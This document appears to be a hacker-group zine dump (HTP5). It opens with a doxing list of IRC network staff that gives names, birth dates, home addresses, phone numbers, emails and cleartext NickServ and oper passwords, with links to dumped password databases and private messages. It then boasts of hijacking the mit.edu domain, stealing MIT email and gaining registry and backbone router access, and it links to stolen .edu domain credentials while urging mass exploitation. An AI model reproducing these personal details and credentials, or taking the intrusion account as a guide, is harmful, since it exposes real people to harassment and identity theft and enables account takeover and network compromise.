http://www.myspace.com/alanonzander
http://user.netonecom.net/~azander/alanon.htm
Havvy
Name: Ryan Havvy
Age: 18?
Address: Somewhere in Washougal, WA
NickServ: Havvy:hmagic
Oper: havvy:hknight
Email: ryan.havvy@gmail.com
http://twitter.com/#!/havvy
http://havvy.wordpress.com/
http://www.stumbleupon.com/stumbler/Havvy/
havvy havvy
xkcd.com/936/ Password security explained in a couple panels.
10 Aug ^^^ coming from someone whose passwords are 6 lowercase characters?? hahahah
Hercule
Name: Jürgen Wind
Location: Germany
NickServ: Hercule:herc47
Oper: hercule:0b2ac71dc51f
Email: jwind@gmx.de
Joshua
Name: Joshua Luckers
Age: 23
DOB: 06/15/1988
NickServ: Joshua:TwEaKeRs
Oper: joshua:ec31e1a98607
Email: joshua@sensiva.net
Mugshot:http://mediacdn.disqus.com/uploads/users/146/1862/avatar92.jpg
http://joshualuckers.nl/
Kitsune
Name: Todd Parker
Email: kitsune@sbcglobal.net
NickServ: Kitsune:undquiet
Oper: kitsune:$5T`mIb5705
http://nenolod.net/~nenolod/mibbit-debacle.html
Molkmin
Name: Thomas W Lyon
Age: 58
DOB: 06/04/1953
Address: 2188 US Highway 10 Sears, MI 49679-8073
NickServ: molkmin:sotw1btn
Oper: molkmin:ghotisotwbtn
Email: tlyon@netonecom.net
Email2: fxrocker@gmail.com
Phone: 231-734-6144
http://www.netonecom.net
http://photobucket.com/home/molkmin <<< molkmin:sotw1btn
http://twitter.com/#!/molkmin <<< molkmin:sotw1btn
Pottsi
Name: Ian Potts
Age: 24
Location: Manchester, UK
NickServ: pottsi:digger
Email: pottsi@pottsi.com
Email2: ian1potts@aol.com
Email3: iantom90@hotmail.co.uk
http://pottsi.com/
http://www.myspace.com/56242380
Sindacious
Name: James Clifton Newton
Age: 19
DOB: 05/06/1992
Address: 1506 Jenks Ave Panama City, FL 32405
Oper: sindacious:284adflgy343
Phone: 785-746-0322, 850-215-2518
Email: admin@SinIRC.net
http://sindacio.us/
http://www.sindacious.com (It just redirects to sindacio.us)
http://twitter.com/sindacious
:: 0x07 - exit ::
>>> K1LL Th3 G1b50n!
attachm3nts >>>
n3t0nec0m shad0ws
m1rr0r 1: http://www.mediafire.com/file/mdlc4wibpacevv6/swshadow
m1rr0r 2: http://www.2shared.com/file/Axzg1umn/swshadow.html
w1k1 pass3s
m1rr0r 1: http://www.mediafire.com/?s9c9jtns5tp8oux
m1rr0r 2: http://www.2shared.com/file/pAg2gqyb/mibbitwiki.html
n1cks3rv pass3s
m1rr0r 1: http://www.mediafire.com/?g8hpr34ssu1ssdq
m1rr0r 2: http://www.2shared.com/document/TLTX8j3E/fullnspassdump.html
pMs
m1rr0r 1: http://www.2shared.com/file/Eq3cyC7f/mibbitpms.html
m1rr0r 2: http://tools.mibbit.com/mibbitpms.out :PppPpPPPPppppppp
cHaN msGs
http://www.2shared.com/file/5Kf08Z3-/mibbitchanmsgs.html
root@tools:~# wall <<< "E0F"
Broadcast Message from root@tools
(/dev/pts/3) at [redacted] ...
E0F

113
htp/HTP5/0x00_Intro.txt Executable file
View File

@ -0,0 +1,113 @@
█████████████▒████████
▓▒██████▒░█░███░░ ▒███████████▒
███████████ ▓█████████████████████▒
▓████ ▒█████████▒▒░███████████████████████▒
░▒███████░████████▒██ ▒██████████████████████░
▓███████████████▒██ ░█ ░████████████████████████░
████████████████████▒ ███▒█████████████████████████████
░████████▒██████████████████ ▒█████████████████████████▒
███████████▒████████████ ▒ ███████████████████████████▒
▒██████████▒ ░████████████ ▒██▓ ░▒██████████████████████████▒
█████████ ▒███▒ ███████░ ███████████████████████████████████
█████████░██████ █████▒██▓ ▓███████▒▒████████████████████████████
▒██████████████████ ████▒▓▒█▒ █████████████████████████████████████
░████████████████████░▓█░ ░█ ░▓███████████████████████████████████
███████████████████▓ ░ █ ░██████████████████████████████████
████████████████████ █▒ ██░▒███████████████████████████████████
▒███████████████████ ▒ ▒▓███▒▓ ███████████████████████████████████
░██████████████████ █▓▓▓▓█░ █ ████████████░ ░████████████████
██████████████████ ▓███ █░ █████████████▓██████████████████ █
██████████████████ ░░ ▓█ ▒ ███████████████████████████████ ▓
██████████████████░ ▓ █░ █ ███████████████████████████████░
██████████████████ ██ ▒███ ████████████████████████████████▒█
███████████████▒██ █ ░▒▒██ ░▒████████████████████████████ █
███████████████▒▒▒ ███ ████████████████████████████▒ █░
█░ ▓▓██████ ░ ▓█ ████▒ █ ████████████████████████████ █▓
██████▒ ▒█ ▒ █▓ █ ▓████████████████████████████ ▒█▒
▓ ▒▒█▓█▓████ ▒▒██▒ ██ ▒▒▒░█████████████████████████████▓██
███▓ █░ ▒██████░ ░ ░▓███▒ ██████████████████████████████░
██ █▓ ░████▒▒ ██ ▒ ░▒▒▓█▒ █████████████████████████████
░ ▓█▓ ██████▓▒ ███ ██ ██▓█▒▓░ ░██████████████████
▒░ ░███ ████████████▒▒ ▓▓ ▓█░ █ ██████████████████
█▒ ▒██▒ ██████████████ ░ █▒ ▒▒█▒▓ ▒▒▒░██████████████████
██ ██ ▒▓ ███████████████████ ██▒ ▒███▒▓██▓ █ ░████████████
██▓█ █ ███████████████████▒ ███▓ ▓█ █▓ ████████████▓
███ ██████████████████████░▒▒█▒ ▒█ █▒ ██ ██████████▓
█▒█ ████████████████████████ ░░ █▒ ▒ ▓██████████
▒▒█ ███████████████████████ █ █ ▒ ▒▒█████████▓
█▒ ▒███████████████████████▒ █ ██ ██▒ ██ ░███▒ ██
██ █ ▒░ ▓███████████████████ ██ ███▒ ▒ ░██ █▒▒ ▒████░░██ ██
█▓███▒ ██▓▒█████████████░ ██ ▓█░░░░██░ █▒ ▒ ░█░ ▓█░░██░
████▒ █ ▓███████████ ▓███░ █ ▓█ ▒ ▒▓ ███
█████ ███ ████████░ ▒█░ ██ █ ██ ▒▓ ▒ ███ ██
█▓██▓ ██▒ ▒███████▓ █▒ ▓▓ ░███ ██▒▒▒ ▒█░ ███████▒
▒█░▒ ░ ░█░ ███████▒ ░▓ ▒█████▒███▓░ ▒███▒████░ ███████▒
▒█████░░ ░▒ ░███████ ░█▓ ░░███ █ █ █ ██████▓
▒██████ ▒███████████ ░ ▒▒███ ░▓ █ ░ ░█ █████▒
▒███████▒ ███ ▒██████░███▒▒▒█░ ▒ ▓ █░ █ ░████▓
███████ ░█░ ░▒ ▓██████ █ ▒█ █░ ▓██░░█▒▒ ▒████▒
▓███████ ▒█▒ ░██ ▒██ ▒ ███████ ███░████▓██████
/████████ /████████ /██████████████████ /███████████████▄
|▒████████ |████████ |▒██████████████████ |▒█████████████████
|▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
|▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
|▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
|▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
|▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
|▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
|/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5
htphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtpht
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
NORTH KOREA OF THE INTERNET SINCE 2011
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
So its been 182 days since our last zine, since then our dedicated team
of researchers, philanthropists, playboys and troublemakers have been
busy at work scouring the Internet for high quality entertainment at the
expense of everybody who isn't us.
5/1 also marks the day HTP was founded, which means we've had two
glorious years of being the best and owning the rest. Today we will be
drinking 40s, listening to some balla tunes, and circlejerking over the
inevitable confusion, awe, bitterness and jokes that will ensue from
this release. :)
Due to the immense size of HTP5, this zine is unfortunately not self
extracting. However do not fret, this zine is full HD and 4D ready.
We've divided everything into its own section just to keep things sane.
So go get the popcorn ready and strap in for a long and wild ride. This
zine is a tale of trust, betrayal, brotherhood, rampant paranoia,
hilariously shoddy police work (More on that later), and the plight of
the whitehat sheep being fleeced at will by their blackhat shepherds.
It's really only missing a tacked on love story, a few good car chases,
and an explosion at the end, but it might not be too late for all of that.
▀ ▄
█▄▄
▄____ ░ █▄
▄ ▄███▀▀ \;',`'-,▓█░
▓██▀-;_,; ':-;_,'.█▓░
▓▓██; '/ , _`.-\█▓
░▓███▄'`. (` /` ` \`|█
░ ▓▓▓ █|██ `\`-. \_ / |▓
░█▓▓█▓░░ | █▓ ( `, .`\ ;'|░
░▓▓█░ ░░ \ ░ ▓░░ .' `-'/▀
▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░ .'▀
░██▓▀ ▀█████████████████▄.-'`
███░ ███▀▀███▀▀███ ███
█████████ ███ ███▄▄███ 2013 ▒ ░
█████████ ███ ██████▀
███ ███ ███ ███
▄███▄ ▄███▄ ███ ▄███▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

285
htp/HTP5/0x01_MIT-EDUCAUSE.txt Executable file
View File

@ -0,0 +1,285 @@
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░████▓██▓██▓▒▒▒░
░▒██████▓▓███████▒████▒░░░░
░▓████████████████▒██▓████▒▒░░ ░░ ░░░░
░▒▓████████████████████████▓▓██▒█▓▒▓▒▒▓█░░ ░░
▒████████████████████████████████▓▓▓██████▓ ▒ ░░
█▓▓███████████████████████████████████████▓▓▓ ░ ░ ░▒
░▓▓█▓███████████████████████████████████████████░ ▒ ░ ▒░
▒▓▓▓▓▓▓▓█████████████████████████████████████████▓▓░░▒ ░
░▒▓▓▒▓▓██████████████████████████████████████████████▓▒ ░░ ░ ░
░▒▒▒▓▓▓▓▓▓▓▓▓▓▓███████████████████████████████████████▓▓█▒ ░ ░░
░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████▓▓▓▒ ▒░
░▒█▓█▓█▓▓▓▓▓▓█▓▓▓▓▓▓█████████████████████████████████████████▒█ ▒░
░▓▓▓▓▓▓▓▒█▓▒▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████░█▓ ░ ▒
░██▓▓▓▓█▓▓▓▓█▒▓▓▓▓▓▓▓▓▓▓▓██████▓████████████████████████████████▓██▓█░░
▒▓█▓▓▓▓▓█▓█▓▒░▒░█▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████▓███▓▒▒
▒█▓▓▓▓▒▓█░░▓▓▓░██▒▓▓▓▓▓▓▓▓▓▓▓████▓██████████████████████████████████▓██▓▓
▓▓▓██▓▒▓▓▓█▒░▓▒▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████████
█▓█▓▓▒▓▒▓▓▓▒░▒▓▓▓▓░░▓▒▓▓▓▓▓▓▓▓█████████████████████████████████████████▓▓▓
░▓▓▓▓▒▓▒▓█▓▓▒░░▓▓▓▓▓▒▒▓▓▒▓▓▓▓▓███▓▓████████████████████████████████████████
░▒░█░▒▒░▒▓▓▓▒▒░░░▓█▓▓▓▒▓▓▒▒▒▓▓▓██▓▓████████████████████████████████████████
░░ ░ ░ ░▒▓▒▒▒▒░▒░▓▓▓▓▓▓▓▒▓▓▒▒▓█████████████████████████████████████████████
▒▓░ ░░░░▒▓▓░▒░▒▓░░░▒▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████████████
██▒▒░░▒░▒▓▓░▒▒▒▒▒░░▒▒▓▓▓▓▓▓▒▓█▓█████████████████████████████████████████████
██▓▒▒▒▒░▒▒▓░██▒▓▓▒▒▒░▓▓▓▒▒▓▓████████████████████████████████████████████████
████▓▓▓▓░▓▓░▓▓█▓▓▒▒▒░░▒█▒▒▓█████████████████████████████████████████████████
█▓█▓▒▓██░█▓░▒▓█▓▓▓▒▒▒▒▒██▓██████████████████████████████████████████████████
▓█▒░░▓▒▒▓▓▒░░░▒▒▒▓▓▓█▓██████████████████████████████████████████████████████
▒█▒░ ▓ ░▒▒░ ░ ░░░░▒░░▒▓█▓█████████████████████████████████████████████████
░█▒░ ░ ░░░░▒█▓███████████████████████████▓▒░▒▒▒▓█████████████
░░ ░░░░░░▒█████████████████████████▓▒▓▓▓▓▓▓▓▒▓███████████
░ ░░░░░░░░░▓███████████████████████▒▓██▓▒░░▒▒▒▒██████████
░ ░░░░░░░░░░░▓▓████████████████████████▓▒░░░░▒░░▓█████████
░ ░░░░▒▓▓▒░░░░░░░░░░░░▒░█████████████████████▓▓▓░ ░░░▒░▒█████████
░░░░ ░▒▓▒ ░▒▒▓▓▒░░░░░░░░▓▒███████████████████████▓██▒▒░░▒░▓████████
░░ ░██▓▓▓▒░░ ░░░░░░░░░░░░░░░▒▓▓██████████████████████▓▓▒▒░░▒░██████▓▓▓
░ ░▒▒▓▓▓░▒░░░▒▒░░░░░░ ░ ░░░░▒█████████████████████▓▓▓▒░░░▒▒██▓██▓▓▓▓
░ ░▒▒▒░ ░░▒▒░░ ░░░░░▓███████████████████▓██▓█▒░▒░███▓█▓▓▓▓▓
░░░░░ ░▒▒░░ ░░░░░░▒████████████████████▓▓▒▒▒░▓▓████▓▓▓██
░░░ ░▒▒░░ ░░░░░░▒▒▓█████████████████▓▓▓▓▒░▓███████▓▓▓█
░░ ░░░░░▒▒▒▒▒██████████████▓▓▓▓▒▒▒▓██████▓▓▓▓▓▓
░░ ░░░░░░▒▒▒▒▒▓█████████████▓▓▓▓▒▒▓██▓██████▓██▓
░░ ░░░░░░▒▒▒▒▒▒▒██████▓██▓██▓▓▓▓▓▓▓▓▓▓▓▓███▓█▓▓▓▓
░░░ ░░░░░░▒▒▒▒▒▒▒▒▒█████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓█▓▓▓▓
░░ ░░░░░░░▒▒░▒▒▒▒▒▒▓████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓███▓▓▓
░ ░░░░░ ░░░░░░▒░▒▒▒▒░▒▒▒▒▒▓███▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓
░░ ░▒░░░░░ ░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓█▓
░░░░░ ░░▒▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓█▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓▓█▓▓
░▓▒▒▒▒▒▓░ ░░░░░░░░░░░░░░▒░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▒░░
▒░░░ ░░░░░░░░░░░░░░░░░░▒░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░
░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓█▓▓▓▒▒░░
░ ░░░░░░░░░░░░░░░░░▒░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓░░
░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓█▓▓▓▒
░▒▒▒▒▒▒▒▓▓▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒░
░▒▒ ░░░ ░░░░░░░░░░░░░░░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒░░
░ ░░░░░ ░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓░░
░▒▒▓▓▒░░ ░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒░░░▒▒▓▓▓▓▓▓█▓▓▓▓▒
░░░▒▒░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓█▒▒░
░ ░░░▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▒░
░ ░░▒▒▒▒▒▒▒▒▒▒░▒▒▒▒▒▒▓▓▓▒░░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓░
░ ░░▒▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▒▒░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░
░ ░░░▒▒▒▒▒▒▒▒▒░ ░▒▓▓▓▓▒▒░░░░░░░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒
░░ ░▒▒▒▒▒▒▒▒░░ ░▒▓▒▒░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓█▓▒▓
░░░▒▒▒▒▒░░░ ░▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒███
░ ░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▒█▓███
░ ░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒███████
░ ░░░░░░░░░░░░░░░░▒▒▒▒░▒▓▒▒▒▓▓▒
░ ░░░░░░░░░░░░░░▒░▒█▓▒▓▓▒▒▒▒
░ ░░░░░░░░░░▒░░▓▒▓▓▓▓▓▒▒▒▒
░ ░░░░░░░▒▒▓█▓██▓▓▓▓▒▓
░ ░▒▒▓▓▓▓▓█▓▓▓▓▓▓▓
▒ ░▒▓▓▓▓▓█▓▓▓▓▓▓▓▒▒
▒▒██ ░░▒▒██▓▒▒▒▒▒▒▒▒▓▓▒▒▒
░▒█▓██▒ ░░▒▓▓▓▓▒▒▓▓▒▓▒▒▒░░░░░
▓███▓██ ░░░▓▒▒▒▒▓▒░▒▓▓▓▓▓▓▓████
░░█████▓▒ ▒▓▓▓░░░░▒▒▓██▒░░░░▓▒▒▒░░░░▓▓▓
░▒▓▒██▒▓░ ░░░░▒░░░░░▒▓▓▓█▒▒░░░▒▓▒▒▒▒░░░░▒▒▒
░█████▒█░░░░░░░░░▒ ░▓██▓▒▒░░░▒▓█▓▓▒▒░░░░░░░░
░ ███▒███▓░░░░░░░░▒░░▓█▓▓░░░░░▒▓▓▓▓▒░░░░░░░▒▓▓
▓█▒█████░░░░░░░░▓░ ███▒░░░░░░░▓▓▒▒░░░░▒▒░▒▒░░
░▒█████▒░░░░░░░▒▒▓▒█▓▒▒░░ ░▒▒▒▒▒▒▒▒▒░░░▒▒▒▓▓▒▒
▒▓██████░░░░░░░▓▒░▓█░░▒▓▒░░░░▒▒▓▓▒░▒░░░░▒▓▒▒▓█▓
███████░░░░░░░░▒▓░▒░▒▓▒░▒░░░▒▒▒▒▓▒▒░ ░░░░░▒▓▓░░
███████░░░░░ ░░░▒▒█░░░░░▒░░▒▒▒▒░▒▓▒░░░░░░░░ ▓░▒▒
▒▒█████░░░░░ ░░░░▒█▓▒ ░▒▒▒▒░▒▒▓░░░▓▓▒░░░░░▒░▒░░░░
▒▒█▒█▒▓░░░░░░░░░░▒██▒██░░░██▒░▒░▒▒▒▒▒░░░░▒▒▓▒▒█▒██
░█▒████░░░░░░░░░░░▓█▒████░░▒▒█▒░░▒▒▒▒▒▒▒▒░░▒░░░▒█▒░
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"What's the score?"
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
██ ██ ██ ██ █████ HTP5
██ ██ ██ ▄▄ ▄▄
██ ▀▀ ██ ██ ██ FEATURING EDUCAUSE
▄██▄▄▄▄██▄▄██▄▄██▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Back in January we decided to upstage Anonymous (again) and have a little fun
with MIT. After their circa 2000 deface on mit.edu, we decided to up the ante.
In doing so, we knew we had to make it very clear that it was an anti-Anonymous
deface (A mirror of it can be found here: straylig.ht/files/mit/mit.html). Thus
why it made reference to Sabu, grand wizard of LulzSec, and "DOWN WITH
ANONYMOUS." Despite all this, some of the cluebags in the media apparently
thought that by "DOWN WITH ANONYMOUS," we meant "we b down wit da lol anonimuss
leejun y0!" Additionally, almost everybody missed the fact that it was a troll
deface, which just proves that it will be a few decades before we reach October
1st, 1993.
MIT's reaction was particularly lulzy. They did a better job of reporting the
facts than all the media outlets, but they couldn't decide whether the e-mail
got intercepted or not. First, there was this from
http://tech.mit.edu/V132/N62/hack.html:
"Unlike previous attacks, which temporarily disabled some services, this attack
had the potential to be much more severe. A more calculated hacker could have
intercepted email messages intended for anyone at the MIT.edu domain, including
all alumni who use alum.mit.edu email addresses."
After having a day to do a better post-mortem, MIT started freaking out. They
published this: http://tech.mit.edu/V132/N63/hack.html. From that link:
"Unlike previous attacks, which temporarily disabled some services, this attack
had the potential to be much more severe. Email was specifically affected. Mail
is normally received by one of nine different MIT servers; however today, mail
that was sent between 11:58 a.m. and 1:05 p.m. was directed to a machine at
KAIST, Korea Advanced Institute of Science and Technology, meaning the
attackers had complete control of emails successfully sent during that time."
We don't know the percentage either, but we know 5.1 GB of uncompressed e-mail
when we see it :P. So who owned the domain? Well :
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Domain Name: MIT.EDU
Registrant:
Massachusetts Institute of Technology
Cambridge, MA 02139
UNITED STATES
Administrative Contact:
I got owned
Massachusetts Institute of Technology
MIT Room W92-167, 77 Massachusetts Avenue
Cambridge, MA 02139-4307
UNITED STATES
(617) 324-1337
cunt@mit.edu
Technical Contact:
OWNED NETWORK OPERATIONS
ROOT
US
DESTROYED, MA 02139-4307
UNITED STATES
(617) 253-1337
owned@mit.edu
Name Servers:
FRED.NS.CLOUDFLARE.COM
KATE.NS.CLOUDFLARE.COM
Domain record activated: 23-May-1985
Domain record last updated: 22-Jan-2013
Domain expires: 31-Jul-2013
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Here's the cherry on top:
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
From: "CloudFlare Support" <support@cloudflare.com>
Subject: [CloudFlare Support] Pending request: Why is cloudflare staff
modifying my dns records? (ticket #12053)
Date: Wed, January 23, 2013 4:48 pm
To: "Fuckmit" <fuckmit@tormail.org>
##- Please type your reply above this line -##
[CloudFlare Support] Pending request: Why is cloudflare staff modifying my dns
records? (ticket #12053)
This is an email to remind you that your request (#12053) is pending and awaits
your feedback.
Please click the link below to review and update your request:
http://support.cloudflare.com/tickets/12053
----------------------------------------------
Justin, Jan 22 11:48 am (PST)
Hi,
We have reason to believe you are not the actual owner of the mit.edu domain.
We have been in contact with the actual owner this morning.
As such we have taken steps to secure the account, and the domain has already
been returned to the actual owner.
----------------------------------------------
Fuckmit, Jan 22 11:45 am (PST)
Two questions:
Why is cloudflare staff modifying my dns records without authorization?
Why is cloudflare staff repeatedly regenerating my API key every time they
decide to modify my dns records without authorization?
--------------------------------
This email is a service from CloudFlare Support
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
You have reason to believe a user named 'Fuckmit' is not the legitimate owner
of mit.edu? Excellent deduction, Justin.
Soon after, we decided to troll Gizmodo and the rest of the media into
preserving our access. The 'browser exploit' on MIT's NOC
( http://gizmodo.com/5978039/hackers-incoherently-deface-entire-mit-website )
never existed. We'd never show our full hand at once, we'd just lose access.
MIT certainly believed us though, despite their own reassurances otherwise. For
confirmation, they contacted the root registrar for EDU domains (EDUCAUSE)
after finally asserting that we got access to their EDUCAUSE account.
EDUCAUSE then made the fatal mistake of overlooking our complete access into
the EDU TLD. Though, we can't say we expect much from a registrar running ASPX
on their backend.
Now, just in case you don't believe us, we have entrusted the login credentials
of nearly every EDU domain to hackers worldwide (active as we speak) within the
MIT section of this zine. So, let's see what happens first, mass exploitation
or whitehat response? ;) We are not ones for defacing, actually, and we're
going to leave that up to the Internet Justice League (AKA Anonymous) if they
can even get to it on time. And we figure they'll manifest some statement
about how its morally justifiable to deface *.edu. We frankly don't care.
By the end of today (5/6), EDU operation should return to normal.
Moreover, we particularly enjoyed the fact that the first nameserver for
root-servers.org is an EDU domain. This effectively gave us control over
root-servers.org. However, ICANN is responsible for the root zones file.
ICANN was already compromised by that time, though, joined by several of the
major RIR's (RIPE, LACNIC, etc.) along with bgp+shell access and 13,000+
backbone AS's (some of which persists to this day) & the InterNIC. Surprisingly,
they used passwordless private keys stored on their servers to ssh into the
internal Juniper routers as superusers: only 3 networks away and not even phys
sep. Nothing proxychains can't handle. They probably should've checked their
netscreens before it was too late. :P
None of this access was ever used, but we did get to see some pretty funny
shit. In the backbone of SourceForge (Savvis), for example, we ran into some
old SunOS Sparc boxes with 1900+ day uptime. They had passwordless private key
auth, and the kernels were fairly ancient (and in the absence of all file
transfer utils, `whois` coupled with a few pipes worked great to transfer tgz's
served from port 43 - no file editing required). As it turns out, we were not
the first ones there. On their Phoenix, AZ stats server, some random hacker was
kicking back in /var/tmp/.access_logx/ with a psyBNC connected to Undernet. On
SourceForge's backbone -- LOL? We don't think he fully realized what he had
breached. Or maybe he just really needed a psyBNC server. Either way, he'll
probably have to end up getting a new psyBNC after today. On Github or
something.
Enjoy the MIT emails/EDUCAUSE login data, included in this segment of
HTP5:
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/mit.zip
|- 2.6GB | Zip compressed MIT emails
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
|- 28MB | EDUCAUSE database: extracted domain credentials
